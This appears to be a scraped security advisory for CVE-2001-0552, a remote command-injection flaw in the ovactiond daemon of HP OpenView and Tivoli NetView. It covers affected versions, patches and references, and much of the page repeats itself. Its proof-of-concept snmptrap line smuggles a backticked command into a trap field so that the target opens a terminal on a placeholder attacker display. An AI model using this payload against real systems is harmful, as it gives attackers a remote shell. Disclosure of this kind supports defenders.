OVActionD SNMPNotify Command Execution Vulnerability
BID:2845
Info
OVActionD SNMPNotify Command Execution Vulnerability
| Bugtraq ID: | 2845 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0552 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 08 2001 12:00AM |
| Updated: | Jul 11 2009 06:56AM |
| Credit: | This vulnerability was announced to Bugtraq by Milo van der Zee <[email protected]> on June 8, 2001. |
| Vulnerable: |
IBM Tivoli NetView 6.0 IBM Tivoli NetView 5.1 IBM Tivoli NetView 5.0 HP OpenView Network Node Manager 6.10 HP OpenView Network Node Manager 5.0 1 |
| Not Vulnerable: |
HP OpenView Network Node Manager 6.2 |
Discussion
OVActionD SNMPNotify Command Execution Vulnerability
ovactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.
A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.
ovactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.
A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.
Exploit / POC
OVActionD SNMPNotify Command Execution Vulnerability
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""
snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""
Solution / Fix
OVActionD SNMPNotify Command Execution Vulnerability
Solution:
Version 6.2 is not vulnerable.
HP has stated that versions prior to 6.1 are not vulnerable by default. It is possible that they may be vulnerable with a custom configuration. Administrators using versions older than 6.1 are advised to upgrade to 6.2.
Patches available for version 6.1:
IBM Tivoli NetView 5.0
IBM Tivoli NetView 5.1
IBM Tivoli NetView 6.0
HP OpenView Network Node Manager 6.10
Solution:
Version 6.2 is not vulnerable.
HP has stated that versions prior to 6.1 are not vulnerable by default. It is possible that they may be vulnerable with a custom configuration. Administrators using versions older than 6.1 are advised to upgrade to 6.2.
Patches available for version 6.1:
IBM Tivoli NetView 5.0
-
IBM Tivoli ovactiond update
http://www.tivoli.com/support/
IBM Tivoli NetView 5.1
-
IBM Tivoli ovactiond update
http://www.tivoli.com/support/
IBM Tivoli NetView 6.0
-
IBM Tivoli ovactiond update
http://www.tivoli.com/support/
HP OpenView Network Node Manager 6.10
-
HP HP-UX 10.20 PHSS_24442
http://ovweb.external.hp.com/cpe/patches/ -
HP HP-UX 11.00 PHSS_24443
http://ovweb.external.hp.com/cpe/patches/ -
HP Solaris 2.x PSOV_02956
http://ovweb.external.hp.com/cpe/patches/ -
HP WinNT4.X/2000 NNM_00743
http://ovweb.external.hp.com/cpe/patches/
References
OVActionD SNMPNotify Command Execution Vulnerability
References:
References:
- HP IT Resource Center (for Europe) (HP IT Resource Center)
- HP IT Resource Center (for US, Canada, Asia-Pacific, & Latin-America) (HP IT Resource Center)
- OpenView Homepage (HP)